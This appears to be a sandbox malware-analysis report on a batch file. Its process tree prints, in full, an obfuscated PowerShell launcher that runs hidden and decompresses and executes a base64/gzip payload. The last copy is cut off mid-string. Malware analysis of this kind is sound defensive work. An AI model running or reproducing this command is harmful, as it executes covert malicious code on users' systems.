Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 12, 2024, 9:14 a.m.	Aug. 12, 2024, 9:33 a.m.

Size	7.0KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`021c1a85ce1ddf7303bfa9b0a222e719`
SHA256	`a5989ebc79180886617a78ab20a3f3dc994f015ad5d57708530a2a2ff72c33fc`
CRC32	`897A39DD`
ssdeep	`96:Gnn2jh1hLmTzaWU/8jVAa6R8wSm06jm8ebEJCslBHuCLcd7SxMhSHoAQdViALm:+n2jh1hqT2WDT8jQEQslBHu9SIApAK`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GXVgeHUO" C:\Users\test22\AppData\Local\Temp\tc10two.bat
652
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\tc10two.bat
  2132
  - cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBzAFAAYgAnACcAKwAnACcAVwBRAEMAQQA3AFYAVwArADIAKwBqAE8AQgBEACsALwBhAFQAOQBIADkAQQBxAFUAawBDAGIAQgB7ADEAfQBMAFkANwBVAE4AYQA2AFUAdwBvAEkAJwAnACsAJwAnAFcAMgBTAEoAcQBWADUAYgAzAFIAeQB3AFEARgB7ADEAfQBEAEUANwBCAE4ARQAzADMAOQBuACsALwBBAFUASQBmADEAMwBiAFYATwAyAGsAdABwAGMAWAAyAHoASABqADgAegBUAGMAegBYAGkAVwBoAEkAeQBnAFAAcABhAFIAWABrADMANQA4ACsARQBQAGEAagB3AEcATwBjAEMARABKAEoAYgBHAHIAVwA2AHcAaQBsAGEATABtADMAZAAyAGgAOAByAGgAZgA4AG8ALwB1AHAAYQArAFMAewAxAH0ARQBDAGIAagBjAEUARABUAHsAMgB9AFAAbAB5AFUAawByAGkAUwBJAFMAaQBuAHgAZQBiAFIATwBCADQAcABnAEUAMQA0AHkAUwBXAEYAYQBrAHsAMQB9ADYAVwBKAFQAeQBKAHkAYwBIAEgAOQBuAFQAaABDACsAaQBHAFYALwBxAHEAMgBHAGIALwBHAGIAQwArADIAYQAyAEgASABKADkASQBCAEMAdAAxADAAcgA4AHMAZABuAEwAcABXAHQAVABlAHsAMgB9AEMAcgBuADgANwBWAHQAWgBXAFIAegBVAGwAdABYAFQAbQB3AFMAegBXAEMANwBiAHUAMQBpAFEAbwBPAG8AeQBWAGwAYQBrAG4AMABwADYANABOAFYAdQBRACsAUgAnACcAKwAnACcAeQBqAHoAbwBSAGoALwBsAEsAVgBDAGMAMABiAE4AUwByAG8AegBEAEcASwA5AEkASABhADcAZQBrAFIANABUAFAAMwBiAGcAewAyAH0AJwAnACsAJwAnAGQAMwBtADgAVABVAFIARQBFAG8AWABaAHAAVgBJAHIAdQBZAHgAYwBoAHMAOQBCAHgAQgAnACcAKwAnACcAMwBrAHUAaABHAEoANAAzAEoARgBXAHEAVAAyAEYAOAB7ADEAfQBsAG4ALwBKAGkAZgAvAGgAbABFAGcAbwBhAGsARwBvAG4ARgBDAFQAaQBHADUAdABFAHQAOQBRAGgAYwBkAFgAJwAnACsAJwAnAEMAbwBjAHsAMQB9AEkASgBWAGsAdABRAGMAcwBXAEUAUQAyADkAcABhAEsAQQAyAEMAMQBmAEUANwBrAFUASgBnAHgAUQAvAFMAOQBtADUARAA3AFoARgB0AEMAOQBWADAAbAArAHEAZwBSAFMAQQB4AEUAcABGAFEAagBxAHkAMgB7ADEAfQAyAHUASgBzAHcAawBpAHUAVwBYAC8ARQB6ADUANABFAEMANAA0AEUATABBAE8ARABQAEYAewAyAH0ATgBWAHcAUwBEACsAKwBSAFUAQwBQAFMANABVAFkANQBIAHQARQBIAEIAWgBIAHsAMQB9AEMAWQBaAHEAcABmAEoAYQAwAGkAOQBlAEIAMABMAEgAaQAwAGcAMgBuAHAASwBrAHEASQBzAG4AdwBBAFgAQwByAHgAYQAyADUAWAAzAG0AdQB0AFYAcQBpAEMASQByAGwAaABzAEwASQBZAGMAKwBvAHUASAAvAFcAZgBoAGIAOABVACcAJwArACcAJwArAFAAZABEAFAANQBWADYAbQA4ADAARwBXAGQARwBRAEcATABzAFEAQgA5AFEAcABDAEMAdQAvAEYAaABXAHkAWQBpAFIARABwAEYAcQBJADkAYwBGAEQAdQBiAHoAZgBJAEsANQBCAEcAUABHAHcAUwBJAEYATwB5AGYARgBDADcAVABTAGcANABrAEYAWABUAHkAaAB6AFMAWQBRAGMAaQBHAHcAewAyAH0AWABrAEgAUQBsAGUAZgBPADUATABHAFQAeQA1ADIAdwBSAHcASwBBAEwANQA4AEQAVwAwAHMAcgBTAEIATgBTAFMATwA5AFQAWQAxAGUAYwBuAHMANQBCAHEATgB4AGkATwBJADQAcgAwAGkAQwBCAFAASABVAHEAawBrADAAdwBJADIANQBGAFEAbQBGAHsAMgB9ADkAMQBzAG8ARQBUAHoANwBMAEQAKwA2ADIAMAB1AFkAbwBBADYATwBSAFcARgB1AHEAZgB3AGIAegAvADIANQBMAFIANwBHAEkAawBvAGMAaQBDAHgAZwBjAEcAVgB7ADEAfQBpAEUAewAyAH0AeABTAHkAJwAnACsAJwAnAEcAcABTAEIAWgAxAGkAYgA2AHoAcQBWAGUAYwBYADMANABWAGsAQgBaAG0ARABCAEkASQBMAE4AMQBDAFEARwBBAGwAQgBjAEkAVwBLAFYAOABpAGMARABYAGoAaABsAEsAMQBpAGUAZwBFAEcAMABZAEMAawB7ADIAfQBrAEsAaAA4AG0AdwBCADIAVgBpAG4AeQBZAFoAdwBiAEIASAAzAFAASgBiAG4AaABiADUAawBKAHsAMgB9AC8AeABhAFkAQQA1AFkAbQBmAEUASABDAGIAYwBWACcAJwArACcAJwBHAFIAeABqAFEAUwBVAEkAZABTAG4ASQBGAGkALwA4AHUATABsAHcAVQBvAGQANgBjAFYAawBYADIAQQA1AEMATABMAEYAewAxAH0AcABPAHAASQBsAFEAdwBxAFAANQBhAFQATwBsADYAaAA2ACcAJwArACcAJwBtAEQASgBSAEkAQQBDAEIAbQB4AEEAewAyAH0AZAB4ACsAUgBMAHsAMgB9ADYAOAAzADgAawBmADEAZwBnADQAUQBqAEoAbABoADIAWgBTAHsAMgB9ADEANwBUAFcAMgBjAEsAewAxAH0AQgA3ADgAUgBiAFgAUwA0AGMAZQBpAGUAbgAzADIAMwAxAEoANwBUAGkAZwBkAHQAOAB3AGoAUgByAGIAZAAxAGoAewAxAH0AcgBJAGMAYwA5AGMAYwBtAHkARAAzAEoAQgBxAG4AUwBQAGsAdAByAHAARABpADUAcABiADAAOQBXAHUAawBEAFcAawBOAGMAKwBqAG0AagBjAGIASQBlAHsAMQB9AEsAZAA1AGcAMgB7ADIAfQBDAHoAVgBuAHMAVQBhADMAVgBxAFQAbgBtAFAAbwA5ADkAdAA2AEQASQBSAHQATgBxADIAcABoAGgAcQBOADUAawBWAEQAVwB3AE8AQQB7ADIAfQA5AEIAYgBJADcAYwBmADAATwAxAGQARgA3ADYAaABzAEYANQAwADkAVQA2AHMAYQB4ADEAMgBlAHQAYQA2AHsAMQB9AEoANwBVAHoAZgBtAEUAVwBXAHIAVAA5AEYAYwBUAEgAdAB0AGYAWgBvAGEAcQBxAHMAYwB1AE4AbgBvADcAaABIAFQAdQBOAG4AcQAnACcAKwAnACcANwBhAGUAMgBTAFgAMQBsAE8AbwBEAGQARAByAGgANgAzAG0AbQB0ADAAaQBsAEEAcgBQAEIAMgBiAE8AagArAGYANgBSAEUAYQBxAEcAUABzAGIAZgBoADIATwBoADIAeQB0AHQAZABDACsAdQBjAG0ASgBmAFAAaAB5AE4AUwBIAFEAMQBOAEgAJwAnACsAJwAnAG8ALwBiADMARwArAE4AWQA5AGQAVABqAHkAUgBUADcAKwBtAFIAYwBwAC8AUABOADkATgBLAEgAdQBiAG0AMQBoAHUAZQBxADEAdQB5ADQANQBKADcAUAB0AHcAQgBjAG0AeQBQAHMAWABZAEsAewAyAH0AMQA2AG8ANwAvAGcAcABrAGoARQA5AEkALwA5AFQAbgBjAFIAMgB7ADEAfQBkAFkANQAwAGsARABIAG4ATgA2AGoAdAB6AHoAYgBtAGcAewAyAH0ASAArADEAYQBqAE8AMABaAGoAMQBwAHgAaAAxADUAegB0AFQAVgBXAHUAegBRAFIATgBaAEcAcAArADAAUABUAFEARQBjAGUAegBwAFEANAB6AGkAVwArAFAAZQBVAEcAdABqAGwANwB1AFQAegAvADMAWgBTAGgAMQBQACcAJwArACcAJwAyAGEARgBxAHQASQBZAEQAZgA1AHIAZQBXAGQAMABFADYAZAArAHQAWgBaAHcANwA4ADkAcgBXAHUAVABnADgANgBrADcAbwBPAE8AQgBvAHAASwByAGoAagA4AEMASwB4AFkAaQBHAG8AbABGAGYAbABwAEwAcABkAE4AVgBKAEsAKwBpAEgAUAAwAHAAYgByAC8AMgBFAEcAbQAvADEAaAB4ADYATwBZAGgAOAB6AG8AQQB4AFUALwBpAEoALwBUAFIANgBaACsAMABvACsANABEAFQAVgBrAE8AWAAwAFQAYgBBAG0AVQBVAGcAJwAnACsAJwAnAFkATgBGAEYAbwBzAHcAWABuAEUAVwBQAGMAUwBUAHMASgAnACcAKwAnACcAbABIAHoAbwBZAFgAbABuAFMAUgB7ADEAfQBkAHEASgAnACcAKwAnACcAUAA1ADkATgBxAFgASQBqADAASQBLAG8AOABOAHAAbABnADYATwBaAG0ARABpADUAQgBFAEcAYgAyAHIAWABSAEoANgB3AHEAOQBvAGQAdwAxAE4AZwA4ADYAZwAzAFcAbgBOAEwARgAzAGUAZgA3AHsAMgB9AFcAMwArAHoAawAzAEYAbwBsAGIAUwA0AHAATgBBAC8AbQBXAFcAWQBlAEwATgBLAFYASgB7ADIAfQB1AC8ASABTADUANABRAHcAaQBvAFoARwA4AEIAOQBoAFoAMgBjAFAAQQBhAHEAZwA3AFUAdwBiAHcAUwBwAEEAagBxAG4ATABPAG4AKwBPAFgAWABlACcAJwArACcAJwB1AEQAQwB7ADIAfQAvAFEAQQB0AGgAcgBjAGYASgBHACsASABuAEsAVwBnAEkAawBEAGMAaQBPAFYAUgBOAHAAYwBuAHoAYgByAEUAagA2ADcASAAwAFMALwBsAFQAcgA3AG0AdQBiAEQAUAAvAGYAWAAxAEgAJwAnACsAJwAnAGwAYwArADgAWAB1AHUAKwBpAGsAVgBUAEoAOABYAHEAdwArAFgAMwAnACcAKwAnACcAagBTAEQAbgA3AGYAOQBTAGUAWQBDAGgAQwAwAG8AUwA0AHoAawBqADgAWQBYAGsATgBoAG4AeQB0AFAAQQBwAHgARgBCAGoASgBoAHQAUgAvAHAATwAvAG8AaQBFAFEAZAA5AGUASgBsAGwAewAxAH0AZQBFAGYAVwBoAGYAQwBQAGMASQBMAEEAJwAnACsAJwAnAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHYAJwAnACwAJwAnAE0AJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
    2220
    - powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASwBzAFAAYgAnACcAKwAnACcAVwBRAEMAQQA3AFYAVwArADIAKwBqAE8AQgBEACsALwBhAFQAOQBIADkAQQBxAFUAawBDAGIAQgB7ADEAfQBMAFkANwBVAE4AYQA2AFUAdwBvAEkAJwAnACsAJwAnAFcAMgBTAEoAcQBWADUAYgAzAFIAeQB3AFEARgB7ADEAfQBEAEUANwBCAE4ARQAzADMAOQBuACsALwBBAFUASQBmADEAMwBiAFYATwAyAGsAdABwAGMAWAAyAHoASABqADgAegBUAGMAegBYAGkAVwBoAEkAeQBnAFAAcABhAFIAWABrADMANQA4ACsARQBQAGEAagB3AEcATwBjAEMARABKAEoAYgBHAHIAVwA2AHcAaQBsAGEATABtADMAZAAyAGgAOAByAGgAZgA4AG8ALwB1AHAAYQArAFMAewAxAH0ARQBDAGIAagBjAEUARABUAHsAMgB9AFAAbAB5AFUAawByAGkAUwBJAFMAaQBuAHgAZQBiAFIATwBCADQAcABnAEUAMQA0AHkAUwBXAEYAYQBrAHsAMQB9ADYAVwBKAFQAeQBKAHkAYwBIAEgAOQBuAFQAaABDACsAaQBHAFYALwBxAHEAMgBHAGIALwBHAGIAQwArADIAYQAyAEgASABKADkASQBCAEMAdAAxADAAcgA4AHMAZABuAEwAcABXAHQAVABlAHsAMgB9AEMAcgBuADgANwBWAHQAWgBXAFIAegBVAGwAdABYAFQAbQB3AFMAegBXAEMANwBiAHUAMQBpAFEAbwBPAG8AeQBWAGwAYQBrAG4AMABwADYANABOAFYAdQBRACsAUgAnACcAKwAnACcAeQBqAHoAbwBSAGoALwBsAEsAVgBDAGMAMABiAE4AUwByAG8AegBEAEcASwA5AEkASABhADcAZQBrAFIANABUAFAAMwBiAGcAewAyAH0AJwAnACsAJwAnAGQAMwBtADgAVABVAFIARQBFAG8AWABaAHAAVgBJAHIAdQBZAHgAYwBoAHMAOQBCAHgAQgAnACcAKwAnACcAMwBrAHUAaABHAEoANAAzAEoARgBXAHEAVAAyAEYAOAB7ADEAfQBsAG4ALwBKAGkAZgAvAGgAbABFAGcAbwBhAGsARwBvAG4ARgBDAFQAaQBHADUAdABFAHQAOQBRAGgAYwBkAFgAJwAnACsAJwAnAEMAbwBjAHsAMQB9AEkASgBWAGsAdABRAGMAcwBXAEUAUQAyADkAcABhAEsAQQAyAEMAMQBmAEUANwBrAFUASgBnAHgAUQAvAFMAOQBtADUARAA3AFoARgB0AEMAOQBWADAAbAArAHEAZwBSAFMAQQB4AEUAcABGAFEAagBxAHkAMgB7ADEAfQAyAHUASgBzAHcAawBpAHUAVwBYAC8ARQB6ADUANABFAEMANAA0AEUATABBAE8ARABQAEYAewAyAH0ATgBWAHcAUwBEACsAKwBSAFUAQwBQAFMANABVAFkANQBIAHQARQBIAEIAWgBIAHsAMQB9AEMAWQBaAHEAcABmAEoAYQAwAGkAOQBlAEIAMABMAEgAaQAwAGcAMgBuAHAASwBrAHEASQBzAG4AdwBBAFgAQwByAHgAYQAyADUAWAAzAG0AdQB0AFYAcQBpAEMASQByAGwAaABzAEwASQBZAGMAKwBvAHUASAAvAFcAZgBoAGIAOABVACcAJwArACcAJwArAFAAZABEAFAANQBWADYAbQA4ADAARwBXAGQARwBRAEcATABzAFEAQgA5AFEAcABDAEMAdQAvAEYAaABXAHkAWQBpAFIARABwAEYAcQBJADkAYwBGAEQAdQBiAHoAZgBJAEsANQBCAEcAUABHAHcAUwBJAEYATwB5AGYARgBDADcAVABTAGcANABrAEYAWABUAHkAaAB6AFMAWQBRAGMAaQBHAHcAewAyAH0AWABrAEgAUQBsAGUAZgBPADUATABHAFQAeQA1ADIAdwBSAHcASwBBAEwANQA4AEQAVwAwAHMAcgBTAEIATgBTAFMATwA5AFQAWQAxAGUAYwBuAHMANQBCAHEATgB4AGkATwBJADQAcgAwAGkAQwBCAFAASABVAHEAawBrADAAdwBJADIANQBGAFEAbQBGAHsAMgB9ADkAMQBzAG8ARQBUAHoANwBMAEQAKwA2ADIAMAB1AFkAbwBBADYATwBSAFcARgB1AHEAZgB3AGIAegAvADIANQBMAFIANwBHAEkAawBvAGMAaQBDAHgAZwBjAEcAVgB7ADEAfQBpAEUAewAyAH0AeABTAHkAJwAnACsAJwAnAEcAcABTAEIAWgAxAGkAYgA2AHoAcQBWAGUAYwBYADMANABWAGsAQgBaAG0ARABCAEkASQBMAE4AMQBDAFEARwBBAGwAQgBjAEkAVwBLAFYAOABpAGMARABYAGoAaABsAEsAMQBpAGUAZwBFAEcAMABZAEMAawB7ADIAfQBrAEsAaAA4AG0AdwBCADIAVgBpAG4AeQBZAFoAdwBiAEIASAAzAFAASgBiAG4AaABiADUAawBKAHsAMgB9AC8AeABhAFkAQQA1AFkAbQBmAEUASABDAGIAYwBWACcAJwArACcAJwBHAFIAeABqAFEAUwBVAEkAZABTAG4ASQBGAGkALwA4AHUATABsAHcAVQBvAGQANgBjAFYAawBYADIAQQA1AEMATABMAEYAewAxAH0AcABPAHAASQBsAFEAdwBxAFAANQBhAFQATwBsADYAaAA2ACcAJwArACcAJwBtAEQASgBSAEkAQQBDAEIAbQB4AEEAewAyAH0AZAB4ACsAUgBMAHsAMgB9ADYAOAAzADgAawBmADEAZwBnADQAUQBqAEoAbABoADIAWgBTAHsAMgB9ADEANwBUAFcAMgBjAEsAewAxAH0AQgA3ADgAUgBiAFgAUwA0AGMAZQBpAGUAbgAzADIAMwAxAEoANwBUAGkAZwBkAHQAOAB3AGoAUgByAGIAZAAxAGoAewAxAH0AcgBJAGMAYwA5AGMAYwBtAHkARAAzAEoAQgBxAG4AUwBQAGsAdAByAHAARABpADUAcABiADAAOQBXAHUAawBEAFcAawBOAGMAKwBqAG0AagBjAGIASQBlAHsAMQB9AEsAZAA1AGcAMgB7ADIAfQBDAHoAVgBuAHMAVQBhADMAVgBxAFQAbgBtAFAAbwA5ADkAdAA2AEQASQBSAHQATgBxADIAcABoAGgAcQBOADUAawBWAEQAVwB3AE8AQQB7ADIAfQA5AEIAYgBJADcAYwBmADAATwAxAGQARgA3ADYAaABzAEYANQAwADkAVQA2AHMAYQB4ADEAMgBlAHQAYQA2AHsAMQB9AEoANwBVAHoAZgBtAEUAVwBXAHIAVAA5AEYAYwBUAEgAdAB0AGYAWgBvAGEAcQBxAHMAYwB1AE4AbgBvADcAaABIAFQAdQBOAG4AcQAnACcAKwAnACcANwBhAGUAMgBTAFgAMQBsAE8AbwBEAGQARAByAGgANgAzAG0AbQB0ADAAaQBsAEEAcgBQAEIAMgBiAE8AagArAGYANgBSAEUAYQBxAEcAUABzAGIAZgBoADIATwBoADIAeQB0AHQAZABDACsAdQBjAG0ASgBmAFAAaAB5AE4AUwBIAFEAMQBOAEgAJwAnACsAJwAnAG8ALwBiADMARwArAE4AWQA5AGQAVABqAHkAUgBUADcAKwBtAFIAYwBwAC8AUABOADkATgBLAEgAdQBiAG0AMQBoAHUAZQBxADEAdQB5ADQANQBKADcAUAB0AHcAQgBjAG0AeQBQAHMAWABZAEsAewAyAH0AMQA2AG8ANwAvAGcAcABrAGoARQA5AEkALwA5AFQAbgBjAFIAMgB7ADEAfQBkAFkANQAwAGsARABIAG4ATgA2AGoAdAB6AHoAYgBtAGcAewAyAH0ASAArADEAYQBqAE8AMABaAGoAMQBwAHgAaAAxADUAegB0AFQAVgBXAHUAegBRAFIATgBaAEcAcAArADAAUABUAFEARQBjAGUAegBwAFEANAB6AGkAVwArAFAAZQBVAEcAdABqAGwANwB1AFQAegAvADMAWgBTAGgAMQBQACcAJwArACcAJwAyAGEARgBxAHQASQBZAEQAZgA1AHIAZQBXAGQAMABFADYAZAArAHQAWgBaAHcANwA4ADkAcgBXAHUAVABnADgANgBrADcAbwBPAE8AQgBvAHAASwByAGoAagA4AEMASwB4AFkAaQBHAG8AbABGAGYAbABwAEwAcABkAE4AVgBKAEsAKwBpAEgAUAAwAHAAYgByAC8AMgBFAEcAbQAvADEAaAB4ADYATwBZAGgAOAB6AG8AQQB4AFUALwBpAEoALwBUAFIANgBaACsAMABvACsANABEAFQAVgBrAE8AWAAwAFQAYgBBAG0AVQBVAGcAJwAnACsAJwAnAFkATgBGAEYAbwBzAHcAWABuAEUAVwBQAGMAUwBUAHMASgAnACcAKwAnACcAbABIAHoAbwBZAFgAbABuAFMAUgB7ADEAfQBkAHEASgAnACcAKwAnACcAUAA1ADkATgBxAFgASQBqADAASQBLAG8AOABOAHAAbABnADYATwBaAG0ARABpADUAQgBFAEcAYgAyAHIAWABSAEoANgB3AHEAOQBvAGQAdwAxAE4AZwA4ADYAZwAzAFcAbgBOAEwARgAzAGUAZgA3AHsAMgB9AFcAMwArAHoAawAzAEYAbwBsAGIAUwA0AHAATgBBAC8AbQBXAFcAWQBlAEwATgBLAFYASgB7ADIAfQB1AC8ASABTADUANABRAHcAaQBvAFoARwA4AEIAOQBoAFoAMgBjAFAAQQBhAHEAZwA3AFUAdwBiAHcAUwBwAEEAagBxAG4ATABPAG4AKwBPAFgAWABlACcAJwArACcAJwB1AEQAQwB7ADIAfQAvAFEAQQB0AGgAcgBjAGYASgBHACsASABuAEsAVwBnAEkAawBEAGMAaQBPAFYAUgBOAHAAYwBuAHoAYgByAEUAagA2ADcASAAwAFMALwBsAFQAcgA3AG0AdQBiAEQAUAAvAGYAWAAxAEgAJwAnACsAJwAnAGwAYwArADgAWAB1AHUAKwBpAGsAVgBUAEoAOABYAHEAdwArAFgAMwAnACcAKwAnACcAagBTAEQAbgA3AGYAOQBTAGUAWQBDAGgAQwAwAG8AUwA0AHoAawBqADgAWQBYAGsATgBoAG4AeQB0AFAAQQBwAHgARgBCAGoASgBoAHQAUgAvAHAATwAvAG8AaQBFAFEAZAA5AGUASgBsAGwAewAxAH0AZQBFAGYAVwBoAGYAQwBQAGMASQBMAEEAJwAnACsAJwAnAEEAQQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAHYAJwAnACwAJwAnAE0AJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
      2264
      - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAKsPb'+'WQCA7VW+2+jOBD+/aT9H9AqUkCbB{1}LY7UNa6UwoI'+'W2SJqV5b3RywQF{1}DE7BNE339n+/AUIf13bVO2ktpcX2zHj8zTczXiWhIygPpaRXk358+EPajwGOcCDJJbGrW6wilaLm3d2h8rhf8o/upa+S{1}ECbjcEDT{2}PlyUkriSISinxebROB4pgE14ySWFak{1}6WJTyJycHH9nThC+iGV/qq2Gb/GbC+2a2HHJ9IBCt10r8sdnLpWtTe{2}Crn87VtZWRzUltXTmwSzWC7bu1iQoOoyVlakn0p64NVuQ+R'+'yjzoRj/lKVCc0bNSrozDGK9IHa7ekR4TP3bg{2}'+'d3m8TUREEoXZpVIruYxchs9BxB'+'3kuhGJ43JFWqT2F8{1}ln/Jif/hlEgoakGonFCTiG5tEt9QhcdX'+'Coc{1}IJVktQcsWEQ29paKA2C1fE7kUJgxQ/S9m5D7ZFtC9V0l+qgRSAxEpFQjqy2{1}2uJswkiuWX/Ez54EC44ELAODPF{2}NVwSD++RUCPS4UY5HtEHBZH{1}CYZqpfJa0i9eB0LHi0g2npKkqIsnwAXCrxa25X3mutVqiCIrlhsLIYc+ouH/Wfhb8U'+'+PdDP5V6m80GWdGQGLsQB9QpCCu/FhWyYiRDpFqI9cFDubzfIK5BGPGwSIFOyfFC7TSg4kFXTyhzSYQciGw{2}XkHQlefO5LGTy52wRwKAL58DW0srSBNSSO9TY1ecns5BqNxiOI4r0iCBPHUqkk0wI25FQmF{2}91soETz7LD+620uYoA6ORWFuqfwbz/25LR7GIkociCxgcGV{1}iE{2}xSy'+'GpSBZ1ib6zqVecX34VkBZmDBIILN1CQGAlBcIWKV8icDXjhlK1iegEG0YCk{2}kKh8mwB2VinyYZwbBH3PJbnhb5kJ{2}/xaYA5YmfEHCbcV'+'GRxjQSUIdSnIFi/8uLlwUod6cVkX2A5CLLF{1}pOpIlQwqP5aTOl6h6'+'mDJRIACBmxA{2}dx+RL{2}6838kf1gg4QjJlh2ZS{2}17TW2cK{1}B78RbXS4ceien3231J7Tigdt8wjRrbd1j{1}rIcc9ccmyD3JBqnSPktrpDi5pb09WukDWkNc+jmjcbIe{1}Kd5g2{2}CzVnsUa3VqTnmPo99t6DIRtNq2phhqN5kVDWwOA{2}9BbI7cf0O1dF76hsF509U6sax12eta6{1}J7UzfmEWWrT9FcTHttfZoaqqscuNno7hHTuNnq'+'7ae2SX